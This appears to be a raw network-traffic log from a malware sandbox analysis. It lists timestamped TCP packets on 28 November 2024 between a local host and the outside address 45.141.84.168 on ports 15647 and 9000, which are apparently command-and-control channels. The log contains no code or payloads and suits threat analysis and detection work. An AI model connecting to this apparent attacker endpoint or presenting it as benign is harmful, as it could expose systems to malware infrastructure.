                                          Nov 28, 2024 13:40:28.520287037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.520302057 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.520339966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.526627064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.527986050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.528058052 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.540270090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.540350914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.540518045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.548403025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.551343918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.551532030 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.566858053 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.568125010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.569535971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.569554090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.569591999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.576308012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.576366901 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.576452017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.585656881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.590306997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.596343994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.602334023 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.610836983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.611861944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.612088919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.626312017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.626435995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.629156113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.634224892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.645466089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.648253918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.660160065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.660592079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.664264917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.670285940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.672825098 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.686584949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.686650991 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.686739922 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.688292980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.694320917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.705403090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.706094027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.706370115 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.706537962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.706604958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.719094992 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.719875097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.722321987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.725783110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.729517937 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.741380930 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.741408110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.741506100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.746447086 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.750210047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.763493061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.763602972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.763844967 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.768924952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.769403934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.769484043 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.777455091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.780219078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.780275106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.786360025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.789752960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.807276011 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.807403088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.808703899 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.808784962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.808912039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.821614027 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.821691990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.826869965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.826955080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.840730906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.840781927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.840792894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.845802069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.846537113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.861917019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.861944914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.861999989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.862020016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.862020016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.862050056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.870249987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.870366096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.872921944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.872940063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.873008966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.882668018 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.882735968 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.882788897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.889432907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.889492989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.890700102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.890996933 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.906804085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.910218000 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.923852921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.924585104 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.924633026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.933562994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.936326027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.947742939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.948487997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.948534966 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.955466986 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.955539942 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.966674089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.970190048 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.970194101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.982637882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.982651949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.982744932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.992990017 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.993038893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:28.994827032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:28.994910002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.008740902 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.008754015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.008927107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.011370897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.011428118 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.016534090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.016813040 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.028301001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.028438091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.029400110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.029448032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.041850090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.042098045 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.044807911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.047100067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.047250032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.063138962 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.063216925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.070231915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.070312977 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.071640015 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.071702003 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.071774960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.083748102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.083800077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.083817959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.100045919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.100123882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.100255013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.100305080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.111135006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.111385107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.117748022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.122239113 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.128741980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.128884077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.128959894 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.134674072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.144046068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.144061089 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.144155979 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.153098106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.158237934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.162127972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.166255951 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.167815924 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.167886019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.167893887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.181405067 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.181535959 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.181622982 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.183238983 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.183295965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.193614006 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.194144011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.204114914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.204128981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.204252005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.211056948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.211188078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.222489119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.226242065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.229382992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.234246969 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.242855072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.242882967 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.242989063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.251450062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.253221989 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.258260965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.260612011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.272233963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.274772882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.274811983 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.284852028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.284938097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.285036087 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.287921906 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.287996054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.301004887 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.302311897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.303216934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.305059910 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.317044020 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.324467897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.328394890 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.329835892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.329922915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.341733932 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.342845917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.342886925 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.346529007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.348280907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.353347063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.356365919 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.363096952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.364305019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.367238998 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.367319107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.379451990 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.379499912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.379601002 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.392680883 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.396437883 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.396451950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.396575928 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.397407055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.397471905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.407135963 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.408256054 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.420705080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.424263000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.424376965 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.424423933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.424482107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.426754951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.426834106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.427100897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.435467958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.436403990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.441997051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.444395065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.444744110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.444799900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.453022957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.454747915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.466046095 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.466113091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.468159914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.468177080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.468213081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.473193884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.476239920 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.484442949 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.485943079 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.486033916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.499872923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.500437975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.502826929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.502911091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.509598970 CET90004983945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.509809971 CET90004983945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.509918928 CET498399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.510040998 CET498399000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.512783051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.515496969 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.515602112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.517642975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.525614023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.528460026 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.540412903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.540947914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.544409037 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.544883966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.544936895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.547574043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.547652006 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.555495024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.556592941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.565258980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.568460941 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.574939966 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.575007915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.585185051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.585359097 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.585427046 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.589756012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.589983940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.607350111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.607363939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.607439041 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.610084057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.610168934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.611941099 CET498419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.624403000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.624460936 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.627950907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.628000975 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.631671906 CET90004983945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.642257929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.643153906 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.652823925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.652915955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.660542965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.660639048 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.670032024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.670092106 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.670171022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.670221090 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.670352936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.670578957 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.678895950 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.680388927 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.685740948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.688266039 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.695651054 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.695890903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.701317072 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.701342106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.701391935 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.710675955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.710736990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.714329958 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.714381933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.714382887 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.728882074 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.729522943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.732297897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.742177010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.742232084 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.742311954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.744256973 CET90004984145.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.748394966 CET498419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.748497009 CET498419000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.756934881 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.758049011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.766547918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.766709089 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.776892900 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.777024984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.777115107 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.780592918 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.784271955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:29.786319971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:29.786406994 CET4973015647192.168.2.445.141.84.168
